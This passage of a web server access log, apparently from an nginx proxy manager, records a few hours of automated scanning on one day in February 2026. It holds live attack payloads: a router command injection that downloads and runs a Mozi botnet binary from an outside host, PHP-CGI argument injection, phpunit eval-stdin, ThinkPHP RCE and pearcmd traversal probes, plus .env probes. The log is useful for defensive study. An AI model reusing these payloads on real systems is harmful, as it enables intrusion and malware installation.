Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:08:03:00 +0000] 404 - GET http localhost-nginx-proxy-manager "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.60.237.31:42440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1" [Client 182.60.237.31] [Length 150] [Gzip -] "-" "-" -[18/Feb/2026:08:04:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[18/Feb/2026:08:05:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:08:05:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.242.226.110] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:08:14:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:08:23:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 60.165.238.170] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" -[18/Feb/2026:08:27:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:08:44:27 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 141.11.184.156] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:08:44:28 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 141.11.184.156] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:08:44:28 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:29 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 141.11.184.156] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:32 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:32 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:38 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:38 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:41 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:41 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:42 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:42 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:44:42 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:08:46:31 +0000] 400 - GET http 222.117.41.51 "/" [Client 85.11.182.25] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" -[18/Feb/2026:08:51:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:08:59:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:09:04:11 +0000] 400 - GET http 222.117.41.51 "/aaa9" [Client 45.91.64.7] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:09:04:12 +0000] 400 - GET http 222.117.41.51 "/aab9" [Client 45.91.64.7] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:09:11:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.189.11.198] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:09:11:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.189.11.198] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" -[18/Feb/2026:09:14:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:09:28:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 111.192.100.104] [Length 1033] [Gzip -] "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-" -[18/Feb/2026:09:39:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:09:42:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:09:56:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:09:57:02 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 77.83.39.82] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.9.0 Safari/538.1" "-" -[18/Feb/2026:10:08:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:10:11:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:10:22:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 51.254.59.113] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" -[18/Feb/2026:10:32:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:10:34:11 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[18/Feb/2026:10:34:12 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[18/Feb/2026:10:34:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:10:34:13 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[18/Feb/2026:10:34:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:10:51:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:10:57:12 +0000] 404 - GET http 222.117.41.51 "/manager/html" [Client 20.65.195.124] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[18/Feb/2026:10:59:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:11:07:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 171.37.46.226] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:11:07:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 223.166.22.114] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:11:07:49 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[18/Feb/2026:11:21:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:11:27:06 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.193.37.92] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:11:27:06 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.193.37.92] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:11:27:06 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.193.37.92] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:11:46:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:11:50:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:11:54:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.237.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" 